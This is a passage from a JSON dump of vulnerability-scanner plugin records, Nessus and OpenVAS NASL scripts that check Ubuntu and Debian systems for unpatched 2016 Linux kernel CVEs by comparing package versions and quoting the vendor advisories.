occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-4/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.4-snapdragon package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-4\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1030-snapdragon\", pkgver:\"4.4.0-1030.33\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-snapdragon\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:26", "description": "USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). 
(CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3099-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3099-2.NASL", "href": "https://www.tenable.com/plugins/nessus/93957", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93957);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3099-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-generic\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-generic-lpae\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-lowlatency\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:54:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "description": "Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696 \nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux", "modified": "2017-07-07T00:00:00", "published": "2016-09-04T00:00:00", "id": "OPENVAS:703659", "href": "http://plugins.openvas.org/nasl.php?oid=703659", "type": "openvas", "title": "Debian Security Advisory DSA 3659-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3659.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703659);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_name(\"Debian Security Advisory DSA 3659-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3659.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core of the Linux operating system.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\n these problems have been fixed in version 3.16.36-1+deb8u1. 
In addition, this\n update contains several changes originally targeted for the upcoming jessie\n point release.\n\n We recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696 \nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux's implementation of the TCP Challenge ACK feature\nresults in a side channel that can be used to find TCP connections\nbetween specific IP addresses, and to inject messages into those\nconnections.\n\nWhere a service is made available through TCP, this may allow\nremote attackers to impersonate another connected user to the\nserver or to impersonate the server to another connected user. In\ncase the service uses a protocol with message authentication\n(e.g. TLS or SSH), this vulnerability only allows denial of\nservice (connection failure). An attack takes tens of seconds, so\nshort-lived TCP connections are also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded:\nsysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136 \nPengfei Wang discovered that the audit subsystem has a\n'double-fetch' or TOCTTOU \nbug in its handling of special\ncharacters in the name of an executable. Where audit logging of\nexecve() is enabled, this allows a local user to generate\nmisleading log messages.\n\nCVE-2016-6480 \nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or TOCTTOU bug in its\nvalidation of FIB \nmessages passed through the ioctl() system\ncall. 
This has no practical security impact in current Debian\nreleases.\n\nCVE-2016-6828 \nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The\nsecurity impact is unclear, but might include denial of service or\nprivilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", 
ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) 
!= NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", 